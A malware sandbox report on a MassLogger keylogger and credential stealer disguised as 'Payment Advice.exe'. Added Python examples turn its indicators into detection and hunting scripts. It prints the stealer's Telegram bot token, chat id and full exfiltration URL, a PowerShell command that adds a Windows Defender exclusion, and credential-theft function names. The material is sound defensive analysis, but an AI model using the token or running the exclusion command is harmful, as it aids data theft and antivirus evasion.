Windows Analysis Report
Payment Advice.exe

Overview

General Information

Sample name: Payment Advice.exe
Analysis ID: 1630045
MD5: 78ec5a1e11ee68c95a5e339fd492c90e
SHA1: 8423eca2ecf74c50f6f688d0555adf9b0a5ace2b
SHA256: eb43ef748d41451eb6cbbf8ca967116280e754d24122b2961472f90c8c00aa9a
Tags: exe, user-threatcat_ch

Detection

MSIL Logger, MassLogger RAT
Score: 100 (range: 0 - 100)
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign process
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Payment Advice.exe (PID: 2708 cmdline: "C:\Users\user\Desktop\Payment Advice.exe" MD5: 78EC5A1E11EE68C95A5E339FD492C90E)
    • powershell.exe (PID: 2852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Payment Advice.exe (PID: 3320 cmdline: "C:\Users\user\Desktop\Payment Advice.exe" MD5: 78EC5A1E11EE68C95A5E339FD492C90E)
    • Payment Advice.exe (PID: 5216 cmdline: "C:\Users\user\Desktop\Payment Advice.exe" MD5: 78EC5A1E11EE68C95A5E339FD492C90E)
  • cleanup

Malware Configuration (MassLogger, extracted from process memory)

{"EXfil Mode": "Telegram", "Telegram Token": "7678702526:AAFF62U3olv_d14DtUBN4vurBh3ZPT14VQ8", "Telegram Chatid": "6440213344"}
Yara matches (memory dumps)

Source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp
  Rule | Description | Author
  JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
  JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
  JoeSecurity_MSILLogger | Yara detected MSIL Logger | Joe Security
  JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
  Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
    Strings:
    0xefdf:$a1: get_encryptedPassword
    0xf307:$a2: get_encryptedUsername
    0xed7a:$a3: get_timePasswordChanged
    0xee9b:$a4: get_passwordField
    0xeff5:$a5: set_encryptedPassword
    0x10951:$a7: get_logins
    0x10602:$a8: GetOutlookPasswords
    0x103f4:$a9: StartKeylogger
    0x108a1:$a10: KeyLoggerEventArgs
    0x10451:$a11: KeyLoggerEventArgsEventHandler
  (22 entries in the full report; only the first source is shown here)
Yara matches (unpacked PEs)

Source: 0.2.Payment Advice.exe.3db1398.2.raw.unpack
  Rule | Description | Author
  JoeSecurity_MassLogger | Yara detected MassLogger RAT | Joe Security
  JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
  JoeSecurity_MSILLogger | Yara detected MSIL Logger | Joe Security
  JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
  Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
    Strings:
    0xf1df:$a1: get_encryptedPassword
    0xf507:$a2: get_encryptedUsername
    0xef7a:$a3: get_timePasswordChanged
    0xf09b:$a4: get_passwordField
    0xf1f5:$a5: set_encryptedPassword
    0x10b51:$a7: get_logins
    0x10802:$a8: GetOutlookPasswords
    0x105f4:$a9: StartKeylogger
    0x10aa1:$a10: KeyLoggerEventArgs
    0x10651:$a11: KeyLoggerEventArgsEventHandler
  (24 entries in the full report; only the first source is shown here)
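The Yara hit lists above (offset, string id, value) and the extracted Telegram configuration can be reproduced with a small triage script. The following is an added example written for this page, not tooling from Joe Sandbox, from the Elastic rule or from the malware author. The dump bytes are constructed; only the ten indicator names, the token and the chat id come from the report. The 6-of-10 threshold in `yara_like_scan` is an assumed demo value (the rule's real condition is not shown on this page), and `build_demo_dump`, `REPORT_CONFIG` and the two regexes are this example's own.

```python
import re

# Identifier strings the Elastic rule reports as $a1..$a11 in the hit list above.
# .NET method names sit as NUL-terminated ASCII in the assembly's #Strings heap,
# so a plain byte search is the right primitive (the same one yara uses).
SNAKE_STRINGS = {
    "$a1": b"get_encryptedPassword",
    "$a2": b"get_encryptedUsername",
    "$a3": b"get_timePasswordChanged",
    "$a4": b"get_passwordField",
    "$a5": b"set_encryptedPassword",
    "$a7": b"get_logins",
    "$a8": b"GetOutlookPasswords",
    "$a9": b"StartKeylogger",
    "$a10": b"KeyLoggerEventArgs",
    "$a11": b"KeyLoggerEventArgsEventHandler",
}

# Telegram bot token = "<bot id>:<35-char secret>". No leading \b, because in
# memory the token is usually glued to ".../bot" inside the API URL.
TOKEN_RE = re.compile(rb"\d{8,10}:[A-Za-z0-9_-]{35}(?![A-Za-z0-9_-])")
# Matches both the URL form chat_id=<n> and the config form "Telegram Chatid": "<n>".
CHATID_RE = re.compile(rb"[Cc]hat_?[Ii]d[\"']?\s*[=:]\s*[\"']?(-?\d{6,})")

# The configuration exactly as the report's extractor printed it.
REPORT_CONFIG = ('{"EXfil Mode": "Telegram", "Telegram Token": '
                 '"7678702526:AAFF62U3olv_d14DtUBN4vurBh3ZPT14VQ8", "Telegram Chatid": "6440213344"}')


def yara_like_scan(blob: bytes, strings=SNAKE_STRINGS, min_distinct=6):
    """Every occurrence of every indicator as (offset, name, value), sorted by
    offset, plus whether at least min_distinct distinct strings were seen.
    min_distinct is an ASSUMED demo threshold, not the rule's real condition."""
    hits = []
    for name, needle in strings.items():
        pos = blob.find(needle)
        while pos != -1:
            hits.append((pos, name, needle.decode()))
            pos = blob.find(needle, pos + 1)
    hits.sort()
    fired = len({name for _, name, _ in hits}) >= min_distinct
    return hits, fired


def extract_telegram_config(blob: bytes) -> dict:
    """Pull bot tokens and chat ids out of a dump and derive the exfil URL
    prefix, which is the thing to block at the proxy and hunt for in HTTP logs."""
    tokens = sorted({m.group(0).decode() for m in TOKEN_RE.finditer(blob)})
    chat_ids = sorted({m.group(1).decode() for m in CHATID_RE.finditer(blob)})
    return {
        "tokens": tokens,
        "chat_ids": chat_ids,
        "exfil_urls": [f"https://api.telegram.org/bot{t}/" for t in tokens],
    }


def build_demo_dump() -> bytes:
    """CONSTRUCTED stand-in for a process memory dump: a fake #Strings heap with
    the indicator names, then the sendDocument URL with the report's token and
    chat id filled in (on disk the sample keeps it as .../bot-/sendDocument?chat_id=)."""
    heap = b"\x00".join([
        b"System.Object", b"get_encryptedPassword", b"get_encryptedUsername",
        b"get_timePasswordChanged", b"get_passwordField", b"set_encryptedPassword",
        b"get_logins", b"GetOutlookPasswords", b"StartKeylogger",
        b"KeyLoggerEventArgs", b"KeyLoggerEventArgsEventHandler",
    ])
    url = (b"https://api.telegram.org/bot7678702526:AAFF62U3olv_d14DtUBN4vurBh3ZPT14VQ8"
           b"/sendDocument?chat_id=6440213344")
    return b"\x00" * 64 + heap + b"\x00" * 32 + url + b"\x00" * 16


if __name__ == "__main__":
    dump = build_demo_dump()
    hits, fired = yara_like_scan(dump)
    for off, name, value in hits:
        print(f"0x{off:x}:{name}: {value}")   # same shape as the report's hit list
    print("rule fired:", fired)
    print(extract_telegram_config(dump))
    print(extract_telegram_config(REPORT_CONFIG.encode()))
```

Note that `$a10` is reported twice: `KeyLoggerEventArgs` occurs on its own and again as the prefix of `KeyLoggerEventArgsEventHandler`, which is also how yara counts it. A token pulled from a dump this way should be treated as an indicator to block and to report to Telegram for revocation, not as something to query.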

                  System Summary

Sigma rule matches (event: Process started)

Three rules matched the same process-creation event: two authored by Florian Roth (Nextron Systems), one by Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements). The event data is identical for all three:
  Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe"
  CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe"
  CommandLine|base64offset|contains: ~2yzw
  Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: "C:\Users\user\Desktop\Payment Advice.exe"
  ParentImage: C:\Users\user\Desktop\Payment Advice.exe
  ParentProcessId: 2708
  ParentProcessName: Payment Advice.exe
  ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe"
  ProcessId: 2852
  ProcessName: powershell.exe
Note: the command line names System32, but Image resolves to SysWOW64 because the 32-bit parent is subject to file-system redirection; a detection keyed on the image path must cover both locations.

Suricata IDS alerts

  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
  2025-03-05T13:08:21.158505+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49733 | 132.226.247.73 | 80 | TCP
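The matched event carries a `CommandLine|base64offset|contains` field because the Sigma rules also look for the cmdlet when it is hidden inside `powershell.exe -EncodedCommand` (UTF-16LE, base64), where a substring encodes to three different spellings depending on its byte alignment. The following is an added example for this page, not code from the report, from Joe Sandbox or from the Sigma rule authors: it reimplements that base64offset expansion and runs it over Sysmon-style process events. The first event reproduces the report's command line; the other two are constructed, and `scan_process_events` with its field names is this example's own.

```python
import base64

# Cmdlets the Sigma rules key on, in the casings the rules list (base64 is case-sensitive).
CMDLETS = ("Add-MpPreference", "Set-MpPreference", "add-mppreference", "set-mppreference")


def base64offset_variants(value: bytes) -> list:
    """The three base64 spellings of `value`, one per byte alignment.

    base64 encodes 3-byte groups, so the same substring encodes differently
    depending on where it starts modulo 3. Prefix 0, 1 or 2 filler bytes,
    encode, then drop the leading/trailing characters whose bits also depend
    on the neighbouring bytes. This is the scheme Sigma's base64offset uses.
    """
    start = (0, 2, 3)            # leading chars polluted by the filler bytes
    end = (None, -3, -2)         # trailing chars polluted by padding, by (total length % 3)
    out = []
    for i in range(3):
        enc = base64.b64encode(b" " * i + value).decode()
        out.append(enc[start[i]:end[(len(value) + i) % 3]])
    return out


def detect_mppreference(cmdline: str):
    """(cmdlet, encoding) if the command line adds/sets Defender preferences in
    clear text or inside a base64 blob (ASCII, or the UTF-16LE that
    powershell.exe -EncodedCommand expects); None otherwise."""
    low = cmdline.lower()
    for c in CMDLETS:
        if c.lower() in low:
            return c, "plain"
    for c in CMDLETS:
        for label, raw in (("base64/ascii", c.encode()),
                           ("base64/utf-16le", c.encode("utf-16le"))):
            if any(v in cmdline for v in base64offset_variants(raw)):
                return c, label
    return None


def scan_process_events(events):
    """Sysmon-EID-1-shaped dicts (Image, CommandLine, ParentImage) -> flagged copies."""
    flagged = []
    for ev in events:
        exe = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
        if exe not in ("powershell.exe", "pwsh.exe"):
            continue                      # the cmdlets only mean something inside PowerShell
        hit = detect_mppreference(ev.get("CommandLine", ""))
        if hit:
            flagged.append({**ev, "cmdlet": hit[0], "encoding": hit[1]})
    return flagged


def encoded_command(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16le")).decode()


SAMPLE_EVENTS = [
    {   # the report's real event (PID 2852): cmdlet in clear text
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Users\user\Desktop\Payment Advice.exe",
        "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                       r'Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe"',
    },
    {   # CONSTRUCTED: the same action hidden behind -EncodedCommand
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Users\user\Desktop\invoice.exe",
        "CommandLine": "powershell.exe -nop -w hidden -enc "
                       + encoded_command('Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming"'),
    },
    {   # CONSTRUCTED benign: an admin only reading the configuration
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe Get-MpPreference",
    },
]

if __name__ == "__main__":
    for f in scan_process_events(SAMPLE_EVENTS):
        print(f"{f['cmdlet']} ({f['encoding']}) spawned by {f['ParentImage']}")
```

The plain-text check is case-insensitive, but the encoded check is not: a blob built from `ADD-MPPREFERENCE` encodes to yet another string, which is why the real rules enumerate several casings. Parent-process context (an executable in the user's profile spawning PowerShell, as here) is the natural second condition to add before alerting.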


                  AV Detection

Source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7678702526:AAFF62U3olv_d14DtUBN4vurBh3ZPT14VQ8", "Telegram Chatid": "6440213344"}
Source: Payment Advice.exe | VirusTotal: Detection: 34%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

                  Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Payment Advice.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49735 version: TLS 1.0
Source: Payment Advice.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: iAbl.pdbSHA256j~^ | source: Payment Advice.exe
Source: Binary string: iAbl.pdb | source: Payment Advice.exe
Source: C:\Users\user\Desktop\Payment Advice.exe | Code function: 4x nop then jmp 0796B8FFh | 0_2_0796B20A
Source: C:\Users\user\Desktop\Payment Advice.exe | Code function: 4x nop then jmp 01875782h | 5_2_01875367
Source: C:\Users\user\Desktop\Payment Advice.exe | Code function: 4x nop then jmp 018751B9h | 5_2_01874F08
Source: C:\Users\user\Desktop\Payment Advice.exe | Code function: 4x nop then jmp 01875782h | 5_2_018756AF
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 104.21.80.1
Source: Joe Sandbox View | IP Address: 132.226.247.73
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown | DNS query: name: checkip.dyndns.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 132.226.247.73:80
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
Source: Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.comd
Source: Payment Advice.exe, 00000005.00000002.2996681350.000000000346C000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: Payment Advice.exe, 00000005.00000002.2996681350.0000000003401000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/d
Source: Payment Advice.exe, 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.orgd
Source: Payment Advice.exe, 00000005.00000002.2996681350.000000000349C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
Source: Payment Advice.exe, 00000005.00000002.2996681350.000000000349C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.orgd
Source: Payment Advice.exe, 00000000.00000002.1762503668.000000000308E000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2996681350.0000000003401000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Payment Advice.exe, 00000000.00000002.1766484792.0000000007002000.00000004.00000800.00020000.00000000.sdmp | Strings found in binary or memory (type-foundry and licence URLs characteristic of embedded font metadata, not C2; all from this one dump):
  http://www.apache.org/licenses/LICENSE-2.0
  http://www.carterandcone.coml
  http://www.fontbureau.com
  http://www.fontbureau.com/designers
  http://www.fontbureau.com/designers/?
  http://www.fontbureau.com/designers/cabarga.htmlN
  http://www.fontbureau.com/designers/frere-user.html
  http://www.fontbureau.com/designers8
  http://www.fontbureau.com/designers?
  http://www.fontbureau.com/designersG
  http://www.fonts.com
  http://www.founder.com.cn/cn
  http://www.founder.com.cn/cn/bThe
  http://www.founder.com.cn/cn/cThe
  http://www.galapagosdesign.com/DPlease
  http://www.galapagosdesign.com/staff/dennis.htm
  http://www.goodfont.co.kr
  http://www.jiyu-kobo.co.jp/
  http://www.sajatypeworks.com
  http://www.sakkal.com
  http://www.sandoll.co.kr
  http://www.tiro.com
  http://www.typography.netD
  http://www.urwpp.deDPlease
  http://www.zhongyicts.com.cn
Source: Payment Advice.exe, 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id= (placeholder form; the token and chat id from the extracted configuration complete it)
Source: Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: Payment Advice.exe, 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
Source: Payment Advice.exe, 00000005.00000002.2996681350.000000000347E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
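The network section above shows a three-step chain that is a useful hunting pattern on its own: a public-IP lookup (checkip.dyndns.org, with no User-Agent or an IE6-era one), a geolocation lookup (reallyfreegeoip.org/xml/<ip>), and shortly afterwards a Telegram bot API call. The following is an added example for this page, not code from the report or from Joe Sandbox: it scores source hosts on that sequence over Zeek-style http.log records. The log lines are constructed (the first three mirror what the report shows for 192.168.2.4), the parser and the 600-second window are this example's own assumptions, and seeing the Telegram URI at all presupposes TLS inspection at the proxy; without it only the SNI api.telegram.org is available.

```python
import re
from collections import defaultdict

IP_LOOKUP_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com", "reallyfreegeoip.org"}
LEGACY_UA_MARKERS = ("MSIE 6.0", "MSIE 7.0", ".NET CLR1.0")  # IE6-era UAs from a modern host
EXFIL_WINDOW = 600.0        # ASSUMED: seconds between the IP lookup and the exfil call
TELEGRAM_BOT_PATH = re.compile(r"/bot[^/?]+")


def parse_http_log(text: str):
    """Subset of Zeek's http.log: ts, id.orig_h, host, uri, user_agent, method
    (tab-separated, '-' = unset). The parser is this example's own."""
    rows = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        ts, src, host, uri, ua, method = line.split("\t")
        rows.append({"ts": float(ts), "src": src, "host": host.lower(), "uri": uri,
                     "ua": None if ua == "-" else ua, "method": method})
    return rows


def score_hosts(rows):
    """Per source IP: the reasons seen and a score (one point per reason).
    The chain the report shows: public-IP lookup, geolocation lookup, then a
    Telegram bot API call shortly afterwards."""
    by_src = defaultdict(list)
    for r in sorted(rows, key=lambda r: r["ts"]):
        by_src[r["src"]].append(r)
    results = {}
    for src, events in by_src.items():
        reasons, first_lookup = [], None
        for r in events:
            if r["host"] in IP_LOOKUP_HOSTS:
                first_lookup = r["ts"] if first_lookup is None else first_lookup
                reasons.append(f"public-IP/geo lookup to {r['host']}")
                if r["ua"] is None:
                    reasons.append("lookup request without User-Agent")
                elif any(m in r["ua"] for m in LEGACY_UA_MARKERS):
                    reasons.append(f"legacy User-Agent on lookup: {r['ua']}")
            elif r["host"] == "api.telegram.org" and r["uri"].startswith("/bot"):
                # Mask the token so the alert text does not carry a live secret.
                path = TELEGRAM_BOT_PATH.sub("/bot<token>", r["uri"].split("?")[0])
                reasons.append(f"Telegram bot API call: {path}")
                if first_lookup is not None and r["ts"] - first_lookup <= EXFIL_WINDOW:
                    reasons.append("Telegram call within window after IP lookup")
        if reasons:
            results[src] = {"score": len(reasons), "reasons": reasons}
    return results


# CONSTRUCTED log. The first three rows mirror what the report shows for the
# sandbox host 192.168.2.4 (its UA string, the /xml/<ip> path, the sendDocument
# URL); the last two are benign filler.
HTTP_LOG = """\
#fields\tts\tid.orig_h\thost\turi\tuser_agent\tmethod
1741176501.158\t192.168.2.4\tcheckip.dyndns.org\t/\tMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)\tGET
1741176502.410\t192.168.2.4\treallyfreegeoip.org\t/xml/8.46.123.189\t-\tGET
1741176533.900\t192.168.2.4\tapi.telegram.org\t/bot7678702526:AAFF62U3olv_d14DtUBN4vurBh3ZPT14VQ8/sendDocument?chat_id=6440213344\t-\tPOST
1741176540.000\t192.168.2.7\twww.example.org\t/index.html\tMozilla/5.0 (Windows NT 10.0; Win64; x64)\tGET
1741176550.000\t192.168.2.9\tcheckip.dyndns.org\t/\tcurl/8.5.0\tGET
"""

if __name__ == "__main__":
    for src, verdict in score_hosts(parse_http_log(HTTP_LOG)).items():
        print(src, verdict["score"], *verdict["reasons"], sep="\n  ")
```

A single lookup with a normal client (the curl row) scores one point and should not page anyone; the sandbox host accumulates six because every step of the chain is present. The same scoring transfers to TLS logs by keying on SNI instead of Host, which also lets the TLS 1.0 negotiation seen above count as a further reason.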

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.Payment Advice.exe.3e343a8.5.raw.unpack, UltraSpeed.cs | .Net Code: VKCodeToUnicode
Source: 0.2.Payment Advice.exe.3db1398.2.raw.unpack, UltraSpeed.cs | .Net Code: VKCodeToUnicode

                  System Summary

Yara rule matches

Windows_Trojan_SnakeKeylogger_af3faa65 (Author: unknown) matched in:
  0.2.Payment Advice.exe.3db1398.2.raw.unpack (UNPACKEDPE)
  0.2.Payment Advice.exe.3e343a8.5.unpack (UNPACKEDPE)
  5.2.Payment Advice.exe.400000.0.unpack (UNPACKEDPE)
  0.2.Payment Advice.exe.3db1398.2.unpack (UNPACKEDPE)
  0.2.Payment Advice.exe.3e343a8.5.raw.unpack (UNPACKEDPE)
  00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp (MEMORY)
  00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp (MEMORY)
  00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp (MEMORY)
  Process Memory Space: Payment Advice.exe PID: 2708 (MEMORYSTR)
  Process Memory Space: Payment Advice.exe PID: 5216 (MEMORYSTR)
  Rule metadata: os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

MAL_Envrial_Jan18_1, "Detects Encrial credential stealer malware" (Author: Florian Roth) matched in:
  0.2.Payment Advice.exe.3db1398.2.raw.unpack (UNPACKEDPE)
  0.2.Payment Advice.exe.3e343a8.5.unpack (UNPACKEDPE)
  5.2.Payment Advice.exe.400000.0.unpack (UNPACKEDPE)
  0.2.Payment Advice.exe.3db1398.2.unpack (UNPACKEDPE)
  Rule metadata: date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: initial sample | Static PE information: Filename: Payment Advice.exe
Source: C:\Users\user\Desktop\Payment Advice.exe | Code functions: 0_2_0110DE94, 0_2_079636B2, 0_2_07966790, 0_2_0796675A, 0_2_07968398, 0_2_07968388, 0_2_07967000, 0_2_07966FF1, 0_2_07968DD0, 0_2_07966BC8, 5_2_0187C168, 5_2_018727B9, 5_2_0187A7E1, 5_2_0187CA58, 5_2_01872DD1, 5_2_01874F08, 5_2_01877E68, 5_2_0187B9D0, 5_2_0187B9E0, 5_2_01874EF8, 5_2_01877E67
Source: Payment Advice.exe, 00000000.00000002.1761916348.000000000114E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Payment Advice.exe
Source: Payment Advice.exe, 00000000.00000002.1762503668.0000000002DCD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs Payment Advice.exe
Source: Payment Advice.exe, 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCloudServices.exe< vs Payment Advice.exe
Source: Payment Advice.exe, 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs Payment Advice.exe
Source: Payment Advice.exe, 00000000.00000002.1766331923.0000000005F90000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTL.dll" vs Payment Advice.exe
Source: Payment Advice.exe, 00000000.00000000.1742483100.0000000000AB4000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameiAbl.exe0 vs Payment Advice.exe
Source: Payment Advice.exe, 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCloudServices.exe< vs Payment Advice.exe
Source: Payment Advice.exe, 00000000.00000002.1767293510.00000000078F0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs Payment Advice.exe
Source: Payment Advice.exe, 00000000.00000002.1762503668.0000000002D91000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCloudServices.exe< vs Payment Advice.exe
